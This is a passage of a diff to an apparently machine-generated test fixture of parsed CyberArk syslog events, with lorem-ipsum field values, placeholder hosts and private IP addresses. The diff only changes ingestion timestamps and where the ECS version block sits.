}, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Ute 2016-12-08 17:06:33.452538723 +0000 UTC sperna5368.mail.invalid %CYBERARK: MessageID=\"81\";Version=1.509;Message=accept;Issuer=tDuisaut;Station=10.214.191.180;File=imvenia;Safe=spi;Location=stquido;Category=ommodico;RequestId=ptas;Reason=pta;Severity=medium;SourceUser=ptatemq;TargetUser=luptatev;GatewayStation=10.72.148.32;TicketID=ipsumd;PolicyID=ntocc;UserName=uteirure;LogonDomain=nevo4284.internal.local;Address=reetdolo6852.www.test;CPMStatus=nnum;Port=5428;Database=uamest;DeviceType=tco;ExtraDetails=uae;", "event": { - "ingested": "2021-06-09T10:19:22.410124200Z" + "ingested": "2021-12-14T14:41:55.823548881Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"168\";Version=1.3599;Message=block;Issuer=ipsumd;Station=10.136.190.236;File=evolu;Safe=ersp;Location=tquov;Category=diconseq;RequestId=inven;Reason=osquira;Severity=low;SourceUser=ataevi;TargetUser=com;GatewayStation=10.252.124.150;TicketID=trud;PolicyID=eriti;UserName=litessec;LogonDomain=itas981.mail.domain;Address=mporin6932.api.localdomain;CPMStatus=roid;Port=6604;Database=tasn;DeviceType=Nemoenim;ExtraDetails=squirati;", "event": { - "ingested": "2021-06-09T10:19:22.410130400Z" + "ingested": "2021-12-14T14:41:55.823549399Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nbyCic 2017-01-06 07:11:41.972538723 +0000 UTC utlabor6305.internal.corp %CYBERARK: MessageID=\"90\";Version=1.5649;Message=accept;Issuer=iquipe;Station=10.192.34.76;File=modtemp;Safe=quovol;Location=nve;Category=remag;RequestId=uredol;Reason=ccaecat;Severity=medium;SourceUser=onsequ;TargetUser=temqu;GatewayStation=10.213.144.249;TicketID=udexerci;PolicyID=naal;UserName=lore;LogonDomain=tnonpro7635.localdomain;Address=illoin2914.mail.lan;CPMStatus=uamni;Port=6895;Database=gnamal;DeviceType=metMalo;ExtraDetails=ntexplic;", "event": { - "ingested": "2021-06-09T10:19:22.410136Z" + "ingested": "2021-12-14T14:41:55.823549796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"376\";Version=1.2217;Message=accept;Issuer=untu;Station=10.154.4.197;File=con;Safe=nisist;Location=usmodte;Category=msequi;RequestId=tau;Reason=exercita;Severity=low;GatewayStation=10.216.84.30;TicketID=orumSe;PolicyID=boree;UserName=intoc;LogonDomain=rQuisau5300.www5.example;Address=evit5780.www.corp;CPMStatus=onev;Port=\"725\";Database=oditem;DeviceType=gitsedqu;ExtraDetails=borios;", "event": { - "ingested": "2021-06-09T10:19:22.410141400Z" + "ingested": "2021-12-14T14:41:55.823550479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-02-03 21:16:50.492538723 +0000 UTC temUt631.www5.example %CYBERARK: MessageID=\"3\";npr 1.4414\",ProductAccount=\"niamqui\",ProductProcess=\"boNem\",EventId=\"ess\",EventClass=\"ipisci\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"tqu\",ActingAddress=\"10.143.193.199\",ActionSourceUser=\"quam\",ActionTargetUser=\"quid\",ActionObject=\"fugiat\",ActionSafe=\"atisun\",ActionLocation=\"esci\",ActionCategory=\"epre\",ActionRequestId=\"tobeata\",ActionReason=\"eroinBCS\",ActionExtraDetails=\"inci\"", "event": { - "ingested": "2021-06-09T10:19:22.410147100Z" + "ingested": "2021-12-14T14:41:55.823551047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 rnatur %CYBERARK: MessageID=\"140\";Version=1.5632;Message=deny;Issuer=essequam;Station=10.193.83.81;File=isisten;Safe=cusant;Location=atemq;Category=rinre;RequestId=naal;Reason=borios;Severity=high;SourceUser=isnostr;TargetUser=umqu;GatewayStation=10.65.175.9;TicketID=inesci;PolicyID=isnisi;UserName=ritatise;LogonDomain=uamei2389.internal.example;Address=uisa5736.internal.local;CPMStatus=cusant;Port=302;Database=ender;DeviceType=riamea;ExtraDetails=entorev;", "event": { - "ingested": "2021-06-09T10:19:22.410864400Z" + "ingested": "2021-12-14T14:41:55.823551659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"87\";tutlab 1.792\",ProductAccount=\"tatn\",ProductProcess=\"dolorsit\",EventId=\"sau\",EventClass=\"aperia\",EventSeverity=\"very-high\",EventMessage=\"accept\",ActingUserName=\"umdolo\",ActingAddress=\"10.205.72.243\",ActionSourceUser=\"stenatu\",ActionTargetUser=\"isiuta\",ActionObject=\"orsitam\",ActionSafe=\"siutaliq\",ActionLocation=\"dutp\",ActionCategory=\"psaquaea\",ActionRequestId=\"taevita\",ActionReason=\"ameiusm\",ActionExtraDetails=\"proide\"", "event": { - "ingested": "2021-06-09T10:19:22.410874400Z" + "ingested": "2021-12-14T14:41:55.823552181Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-03-18 18:24:33.272538723 +0000 UTC velitess7586.mail.example %CYBERARK: MessageID=\"45\";nre 1.7231\",ProductAccount=\"sit\",ProductProcess=\"olab\",EventId=\"eumiure\",EventClass=\"ersp\",EventSeverity=\"medium\",EventMessage=\"allow\",ActingUserName=\"mquisno\",ActingAddress=\"10.107.9.163\",ActionSourceUser=\"uptate\",ActionTargetUser=\"mac\",ActionObject=\"iumdol\",ActionSafe=\"tpersp\",ActionLocation=\"stla\",ActionCategory=\"uptatema\",ActionRequestId=\"oeni\",ActionReason=\"tdol\",ActionExtraDetails=\"sit\"", "event": { - "ingested": "2021-06-09T10:19:22.410880400Z" + "ingested": "2021-12-14T14:41:55.823552981Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 psum %CYBERARK: MessageID=\"132\";tasnulap 1.7220\",ProductAccount=\"umSe\",ProductProcess=\"xeacomm\",EventId=\"cinge\",EventClass=\"itla\",EventSeverity=\"high\",EventMessage=\"deny\",ActingUserName=\"asiarc\",ActingAddress=\"10.80.101.72\",ActionSourceUser=\"uptate\",ActionTargetUser=\"quidexea\",ActionObject=\"ect\",ActionSafe=\"modocons\",ActionLocation=\"gitsed\",ActionCategory=\"fugia\",ActionRequestId=\"oditautf\",ActionReason=\"quatu\",ActionExtraDetails=\"veli\"", "event": { - "ingested": "2021-06-09T10:19:22.410887400Z" + "ingested": "2021-12-14T14:41:55.823553674Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 labo %CYBERARK: MessageID=\"200\";Version=1.267;Message=accept;Issuer=aboreetd;Station=10.235.136.109;File=lorin;Safe=pitl;Location=por;Category=quidexea;RequestId=nimid;Reason=runtmol;Severity=very-high;SourceUser=odi;TargetUser=ptass;GatewayStation=10.39.10.155;TicketID=dol;PolicyID=proiden;UserName=urExcept;LogonDomain=miurerep1152.internal.domain;Address=utlab3706.api.host;CPMStatus=dantium;Port=246;Database=teirured;DeviceType=onemulla;ExtraDetails=dolorem;", "event": { - "ingested": "2021-06-09T10:19:22.410893300Z" + "ingested": "2021-12-14T14:41:55.823554263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 ationev %CYBERARK: MessageID=\"233\";umdolor 1.4389\",ProductAccount=\"itation\",ProductProcess=\"paquioff\",EventId=\"nci\",EventClass=\"isau\",EventSeverity=\"low\",EventMessage=\"cancel\",ActingUserName=\"ibusBon\",ActingAddress=\"10.96.224.19\",ActionSourceUser=\"nsequat\",ActionTargetUser=\"doloreme\",ActionObject=\"dun\",ActionSafe=\"reprehe\",ActionLocation=\"tincu\",ActionCategory=\"suntin\",ActionRequestId=\"itse\",ActionReason=\"umexerc\",ActionExtraDetails=\"oremipsu\"", "event": { - "ingested": "2021-06-09T10:19:22.410898500Z" + "ingested": "2021-12-14T14:41:55.823554858Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-05-14 22:34:50.312538723 +0000 UTC ntsunt4826.mail.corp %CYBERARK: MessageID=\"170\";olo 1.237\",ProductAccount=\"aec\",ProductProcess=\"fdeF\",EventId=\"iquidexe\",EventClass=\"diconse\",EventSeverity=\"medium\",EventMessage=\"cancel\",ActingUserName=\"reseo\",ActingAddress=\"10.71.238.250\",ActionSourceUser=\"consequa\",ActionTargetUser=\"moenimi\",ActionObject=\"olupt\",ActionSafe=\"oconsequ\",ActionLocation=\"edquiac\",ActionCategory=\"urerepr\",ActionRequestId=\"eseru\",ActionReason=\"quamest\",ActionExtraDetails=\"mac\"", "event": { - "ingested": "2021-06-09T10:19:22.410905400Z" + "ingested": "2021-12-14T14:41:55.823555578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"294\";Version=1.3804;Message=deny;Issuer=rationev;Station=10.226.20.199;File=tatem;Safe=untutlab;Location=amcor;Category=ica;RequestId=lillum;Reason=remips;Severity=low;SourceUser=taedicta;TargetUser=ritt;GatewayStation=10.226.101.180;TicketID=itesseq;PolicyID=dictasun;UserName=veniamqu;LogonDomain=rum5798.home;Address=mvel1188.internal.localdomain;CPMStatus=tetur;Port=2694;Database=conse;DeviceType=ipi;ExtraDetails=imveniam;", "event": { - "ingested": "2021-06-09T10:19:22.410910800Z" + "ingested": "2021-12-14T14:41:55.823556430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 licabo %CYBERARK: MessageID=\"13\";Version=1.1493;Message=cancel;Issuer=utaliqu;Station=10.86.22.67;File=nvolupt;Safe=oremi;Location=elites;Category=nbyCi;RequestId=tevel;Reason=usc;Severity=high;SourceUser=equinesc;TargetUser=cab;GatewayStation=10.134.65.15;TicketID=equepor;PolicyID=ncidid;UserName=quaUten;LogonDomain=nisiut3624.api.example;Address=perspici5680.domain;CPMStatus=iconseq;Port=2039;Database=isciv;DeviceType=rroqu;ExtraDetails=nofd;", "event": { - "ingested": "2021-06-09T10:19:22.410915900Z" + "ingested": "2021-12-14T14:41:55.823557076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"358\";ilmol 1.5112\",ProductAccount=\"tten\",ProductProcess=\"ueipsa\",EventId=\"tae\",EventClass=\"autodit\",EventSeverity=\"very-high\",EventMessage=\"accept\",ActingUserName=\"cidunt\",ActingAddress=\"10.70.147.120\",ActionSourceUser=\"exeaco\",ActionTargetUser=\"emqu\",ActionObject=\"nderi\",ActionSafe=\"acommod\",ActionLocation=\"itsedd\",ActionCategory=\"leumiur\",ActionRequestId=\"eratvol\",ActionReason=\"quidol\",ActionExtraDetails=\"eaqu\"", "event": { - "ingested": "2021-06-09T10:19:22.410920600Z" + "ingested": "2021-12-14T14:41:55.823557577Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "luptatem 2017-07-11 02:45:07.352538723 +0000 UTC uaeratv3432.invalid %CYBERARK: MessageID=\"160\";Version=1.6255;Message=cancel;Issuer=dqu;Station=10.178.242.100;File=dutpers;Safe=erun;Location=orisn;Category=reetd;RequestId=prehen;Reason=ntutlabo;Severity=medium;SourceUser=rad;TargetUser=loi;GatewayStation=10.24.111.229;TicketID=volupt;PolicyID=rem;UserName=idid;LogonDomain=tesse1089.www.host;Address=ptateve6909.www5.lan;CPMStatus=toccaec;Port=7645;Database=tenatuse;DeviceType=psaqua;ExtraDetails=ullamcor;", "event": { - "ingested": "2021-06-09T10:19:22.410926Z" + "ingested": "2021-12-14T14:41:55.823558089Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-07-25 09:47:41.612538723 +0000 UTC cupi1867.www5.test %CYBERARK: MessageID=\"67\";orroq 1.6677\",ProductAccount=\"ritati\",ProductProcess=\"orisni\",EventId=\"ons\",EventClass=\"remagn\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"mmodoc\",ActingAddress=\"10.211.179.168\",ActionSourceUser=\"atu\",ActionTargetUser=\"untincul\",ActionObject=\"ssecil\",ActionSafe=\"commodi\",ActionLocation=\"emporain\",ActionCategory=\"ntiumto\",ActionRequestId=\"umetMalo\",ActionReason=\"oluptas\",ActionExtraDetails=\"emvele\"", "event": { - "ingested": "2021-06-09T10:19:22.410931400Z" + "ingested": "2021-12-14T14:41:55.823558734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Sedut 2017-08-08 16:50:15.872538723 +0000 UTC yCiceroi2786.www.test %CYBERARK: MessageID=\"141\";iquamqua 1.4890\",ProductAccount=\"dolore\",ProductProcess=\"nsequat\",EventId=\"olorsi\",EventClass=\"aliq\",EventSeverity=\"low\",EventMessage=\"cancel\",ActingUserName=\"mven\",ActingAddress=\"10.30.243.163\",ActionSourceUser=\"oremag\",ActionTargetUser=\"illu\",ActionObject=\"ruredo\",ActionSafe=\"mac\",ActionLocation=\"temUt\",ActionCategory=\"ptassita\",ActionRequestId=\"its\",ActionReason=\"lore\",ActionExtraDetails=\"idol\"", "event": { - "ingested": "2021-06-09T10:19:22.410936200Z" + "ingested": "2021-12-14T14:41:55.823559296Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-08-22 23:52:50.132538723 +0000 UTC urmag7650.api.invalid %CYBERARK: MessageID=\"26\";Version=1.1844;Message=cancel;Issuer=amvo;Station=10.6.79.159;File=ommodo;Safe=uptat;Location=idex;Category=ptateve;RequestId=cons;Reason=olorese;Severity=high;SourceUser=ore;TargetUser=quid;GatewayStation=10.212.214.4;TicketID=ddoeius;PolicyID=ugiatn;UserName=midestl;LogonDomain=dictasun3878.internal.localhost;Address=modocon5089.mail.example;CPMStatus=lupta;Port=5112;Database=urExce;DeviceType=asi;ExtraDetails=ectiono;", "event": { - "ingested": "2021-06-09T10:19:22.410940800Z" + "ingested": "2021-12-14T14:41:55.823559847Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onu 2017-09-06 06:55:24.392538723 +0000 UTC liquaUte6729.api.localhost %CYBERARK: MessageID=\"150\";Version=1.3546;Message=deny;Issuer=atDu;Station=10.237.170.202;File=maperi;Safe=agnaaliq;Location=tlaboree;Category=norumet;RequestId=dtempo;Reason=tin;Severity=low;SourceUser=mve;TargetUser=liquide;GatewayStation=10.70.147.46;TicketID=inv;PolicyID=rroq;UserName=rcit;LogonDomain=aecatcup2241.www5.test;Address=tempor1282.www5.localhost;CPMStatus=incidid;Port=7699;Database=taedict;DeviceType=edquian;ExtraDetails=loremeu;", "event": { - "ingested": "2021-06-09T10:19:22.410945700Z" + "ingested": "2021-12-14T14:41:55.823560672Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmi 2017-09-20 13:57:58.652538723 +0000 UTC untexpl2847.www5.local %CYBERARK: MessageID=\"292\";Version=1.4282;Message=allow;Issuer=emoe;Station=10.179.50.138;File=ehende;Safe=eaqueip;Location=eum;Category=lamc;RequestId=umetMal;Reason=asper;Severity=high;SourceUser=metcons;TargetUser=itasper;GatewayStation=10.228.118.81;TicketID=temquiav;PolicyID=obeata;UserName=tatemU;LogonDomain=mad5185.www5.localhost;Address=mipsum2964.invalid;CPMStatus=doei;Port=6825;Database=toditaut;DeviceType=voluptat;ExtraDetails=ugit;", "event": { - "ingested": "2021-06-09T10:19:22.410950800Z" + "ingested": "2021-12-14T14:41:55.823561322Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 asnu %CYBERARK: MessageID=\"38\";Version=1.3806;Message=cancel;Issuer=henderit;Station=10.49.71.118;File=ationul;Safe=mquisn;Location=queips;Category=midest;RequestId=dex;Reason=ccae;Severity=medium;SourceUser=eavolup;TargetUser=emip;GatewayStation=10.234.165.130;TicketID=ntexplic;PolicyID=uto;UserName=iuntNequ;LogonDomain=esseq7889.www.invalid;Address=veniamq1236.invalid;CPMStatus=emo;Port=1458;Database=veniamqu;DeviceType=licaboN;ExtraDetails=atquo;", "event": { - "ingested": "2021-06-09T10:19:22.410955700Z" + "ingested": "2021-12-14T14:41:55.823561935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "udan 2017-10-19 04:03:07.172538723 +0000 UTC yCic5749.www.localhost %CYBERARK: MessageID=\"119\";itanim 1.4024\",ProductAccount=\"olorema\",ProductProcess=\"mollita\",EventId=\"tatem\",EventClass=\"iae\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"emip\",ActingAddress=\"10.199.5.49\",ActionSourceUser=\"stquid\",ActionTargetUser=\"turadipi\",ActionObject=\"usmodi\",ActionSafe=\"ree\",ActionLocation=\"saquaea\",ActionCategory=\"ation\",ActionRequestId=\"luptas\",ActionReason=\"minim\",ActionExtraDetails=\"ataevi\"", "event": { - "ingested": "2021-06-09T10:19:22.410960300Z" + "ingested": "2021-12-14T14:41:55.823562689Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"156\";plic 1.7053\",ProductAccount=\"utlabo\",ProductProcess=\"tetur\",EventId=\"tionula\",EventClass=\"ritqu\",EventSeverity=\"very-high\",EventMessage=\"allow\",ActingUserName=\"uamei\",ActingAddress=\"10.193.219.34\",ActionSourceUser=\"onse\",ActionTargetUser=\"olorem\",ActionObject=\"turvel\",ActionSafe=\"eratv\",ActionLocation=\"ipsa\",ActionCategory=\"asuntexp\",ActionRequestId=\"adminim\",ActionReason=\"orisni\",ActionExtraDetails=\"nse\"", "event": { - "ingested": "2021-06-09T10:19:22.410965100Z" + "ingested": "2021-12-14T14:41:55.823563454Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 nderi %CYBERARK: MessageID=\"202\";Version=1.7083;Message=allow;Issuer=animid;Station=10.120.167.217;File=atuse;Safe=ueipsa;Location=scipitl;Category=eumi;RequestId=quasiarc;Reason=olli;Severity=low;SourceUser=tetura;TargetUser=rsp;GatewayStation=10.174.185.109;TicketID=roquisqu;PolicyID=edolorin;UserName=dolorem;LogonDomain=tem6815.home;Address=taliqui5348.mail.localdomain;CPMStatus=loremag;Port=6816;Database=tsuntinc;DeviceType=inrepreh;ExtraDetails=quovo;", "event": { - "ingested": "2021-06-09T10:19:22.410970200Z" + "ingested": "2021-12-14T14:41:55.823564096Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"133\";Version=1.1432;Message=cancel;Issuer=atev;Station=10.117.137.159;File=acommodi;Safe=essecill;Location=billoi;Category=moles;RequestId=dipiscin;Reason=olup;Severity=high;SourceUser=undeomni;TargetUser=accusa;GatewayStation=10.141.213.219;TicketID=itat;PolicyID=stlaboru;UserName=ate;LogonDomain=mporainc2064.home;Address=atnulapa3548.www.domain;CPMStatus=radipisc;Port=5347;Database=nibus;DeviceType=vitaed;ExtraDetails=ser;", "event": { - "ingested": "2021-06-09T10:19:22.410974700Z" + "ingested": "2021-12-14T14:41:55.823564817Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-12-15 08:13:24.212538723 +0000 UTC ill6772.www.invalid %CYBERARK: MessageID=\"104\";Version=1.4043;Message=cancel;Issuer=rem;Station=10.166.90.130;File=mdolore;Safe=eosquira;Location=pta;Category=snos;RequestId=orsi;Reason=tetura;Severity=very-high;SourceUser=lorsita;TargetUser=eavol;GatewayStation=10.94.224.229;TicketID=lupta;PolicyID=npr;UserName=etconsec;LogonDomain=caboNem1043.internal.home;Address=litesseq6785.host;CPMStatus=tob;Port=7390;Database=oditempo;DeviceType=doeiu;ExtraDetails=deF;", "event": { - "ingested": "2021-06-09T10:19:22.410979100Z" + "ingested": "2021-12-14T14:41:55.823565564Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rcitat 2017-12-29 15:15:58.472538723 +0000 UTC dolorema2984.www.home %CYBERARK: MessageID=\"316\";Version=1.2456;Message=deny;Issuer=tiumto;Station=10.38.28.151;File=nrepreh;Safe=ratv;Location=alorum;Category=mquisn;RequestId=atq;Reason=erspi;Severity=low;SourceUser=ugiatquo;TargetUser=incidid;GatewayStation=10.201.81.46;TicketID=sBonor;PolicyID=fugits;UserName=mipsumqu;LogonDomain=tatio6513.www.invalid;Address=onnu2272.mail.corp;CPMStatus=atatnon;Port=6064;Database=abor;DeviceType=magnid;ExtraDetails=adol;", "event": { - "ingested": "2021-06-09T10:19:22.410983700Z" + "ingested": "2021-12-14T14:41:55.823566248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 niam %CYBERARK: MessageID=\"266\";Version=1.2721;Message=deny;Issuer=rerepre;Station=10.214.245.95;File=quiineav;Safe=billoinv;Location=sci;Category=col;RequestId=obea;Reason=emp;Severity=medium;SourceUser=luptas;TargetUser=uptatem;GatewayStation=10.255.28.56;TicketID=inrepr;PolicyID=mol;UserName=umdolors;LogonDomain=dolori6232.api.invalid;Address=llit958.www.domain;CPMStatus=tat;Port=2957;Database=odt;DeviceType=cillumd;ExtraDetails=riosa;", "event": { - "ingested": "2021-06-09T10:19:22.410988200Z" + "ingested": "2021-12-14T14:41:55.823567046Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 lapar %CYBERARK: MessageID=\"311\";ritati 1.3219\",ProductAccount=\"qui\",ProductProcess=\"otamr\",EventId=\"nim\",EventClass=\"ame\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"mip\",ActingAddress=\"10.45.35.180\",ActionSourceUser=\"mvolupta\",ActionTargetUser=\"Utenima\",ActionObject=\"iqua\",ActionSafe=\"luptat\",ActionLocation=\"deriti\",ActionCategory=\"sintocc\",ActionRequestId=\"cididu\",ActionReason=\"uteir\",ActionExtraDetails=\"boree\"", "event": { - "ingested": "2021-06-09T10:19:22.410992700Z" + "ingested": "2021-12-14T14:41:55.823567522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 diduntu %CYBERARK: MessageID=\"285\";eiusmod 1.7546\",ProductAccount=\"ess\",ProductProcess=\"uide\",EventId=\"scivel\",EventClass=\"henderi\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"enim\",ActingAddress=\"10.141.200.133\",ActionSourceUser=\"ersp\",ActionTargetUser=\"iame\",ActionObject=\"orroquis\",ActionSafe=\"aquio\",ActionLocation=\"riatu\",ActionCategory=\"loinve\",ActionRequestId=\"tanimid\",ActionReason=\"isnostru\",ActionExtraDetails=\"nofdeFi\"", "event": { - "ingested": "2021-06-09T10:19:22.410996900Z" + "ingested": "2021-12-14T14:41:55.823567967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"155\";ulap 1.3765\",ProductAccount=\"illoi\",ProductProcess=\"reetdolo\",EventId=\"rationev\",EventClass=\"ehender\",EventSeverity=\"medium\",EventMessage=\"accept\",ActingUserName=\"ugi\",ActingAddress=\"10.83.238.145\",ActionSourceUser=\"ptatems\",ActionTargetUser=\"runtmo\",ActionObject=\"ore\",ActionSafe=\"isund\",ActionLocation=\"exerci\",ActionCategory=\"tas\",ActionRequestId=\"oraincid\",ActionReason=\"quaer\",ActionExtraDetails=\"eetdo\"", "event": { - "ingested": "2021-06-09T10:19:22.411001500Z" + "ingested": "2021-12-14T14:41:55.823570766Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-03-11 02:28:49.772538723 +0000 UTC aali6869.api.localdomain %CYBERARK: MessageID=\"48\";Version=1.3147;Message=block;Issuer=sedquiac;Station=10.39.143.155;File=ipsaqu;Safe=nisiut;Location=rumwri;Category=velill;RequestId=ore;Reason=tation;Severity=very-high;SourceUser=porincid;TargetUser=tperspic;GatewayStation=10.41.89.217;TicketID=ict;PolicyID=squirati;UserName=tem;LogonDomain=mestq2106.api.host;Address=llamc6724.www.lan;CPMStatus=tesseci;Port=4020;Database=radipis;DeviceType=cive;ExtraDetails=nse;", "event": { - "ingested": "2021-06-09T10:19:22.411005900Z" + "ingested": "2021-12-14T14:41:55.823571353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isnisiu 2018-03-25 09:31:24.032538723 +0000 UTC suntincu2940.www5.domain %CYBERARK: MessageID=\"378\";Version=1.6382;Message=accept;Issuer=minim;Station=10.5.5.1;File=reseosq;Safe=gna;Location=isiutali;Category=lumqu;RequestId=onulamco;Reason=ons;Severity=low;SourceUser=uptat;TargetUser=unt;GatewayStation=10.153.123.20;TicketID=tla;PolicyID=mquiad;UserName=CSe;LogonDomain=lors7553.api.local;Address=reseosqu1629.mail.lan;CPMStatus=utemvel;Port=5325;Database=atu;DeviceType=iusm;ExtraDetails=roi;", "event": { - "ingested": "2021-06-09T10:19:22.411010300Z" + "ingested": "2021-12-14T14:41:55.823571835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-04-08 16:33:58.292538723 +0000 UTC rere5274.mail.domain %CYBERARK: MessageID=\"269\";Version=1.3193;Message=deny;Issuer=iamea;Station=10.210.61.109;File=tiumto;Safe=cor;Location=odoco;Category=oin;RequestId=itseddoe;Reason=elites;Severity=low;SourceUser=uamei;TargetUser=eursinto;GatewayStation=10.168.132.175;TicketID=licaboNe;PolicyID=tautfug;UserName=giatquov;LogonDomain=olu5333.www.domain;Address=orumSe4514.www.corp;CPMStatus=umquam;Port=80;Database=ici;DeviceType=nisiuta;ExtraDetails=iquaUt;", "event": { - "ingested": "2021-06-09T10:19:22.411014700Z" + "ingested": "2021-12-14T14:41:55.823572339Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"176\";atnula 1.5038\",ProductAccount=\"lmo\",ProductProcess=\"iquidex\",EventId=\"olup\",EventClass=\"remipsu\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"quiac\",ActingAddress=\"10.123.154.17\",ActionSourceUser=\"etdol\",ActionTargetUser=\"dolorsi\",ActionObject=\"nturmag\",ActionSafe=\"tura\",ActionLocation=\"osquirat\",ActionCategory=\"equat\",ActionRequestId=\"aliquid\",ActionReason=\"usantiu\",ActionExtraDetails=\"idunt\"", "event": { - "ingested": "2021-06-09T10:19:22.411019300Z" + "ingested": "2021-12-14T14:41:55.823572754Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"4\";min 1.136\",ProductAccount=\"xplic\",ProductProcess=\"eseruntm\",EventId=\"lpaquiof\",EventClass=\"oloreeu\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"etquasia\",ActingAddress=\"10.169.123.103\",ActionSourceUser=\"riatur\",ActionTargetUser=\"oeni\",ActionObject=\"dol\",ActionSafe=\"dol\",ActionLocation=\"atur\",ActionCategory=\"issu\",ActionRequestId=\"identsu\",ActionReason=\"piscivel\",ActionExtraDetails=\"hend\"", "event": { - "ingested": "2021-06-09T10:19:22.411023800Z" + "ingested": "2021-12-14T14:41:55.823573255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 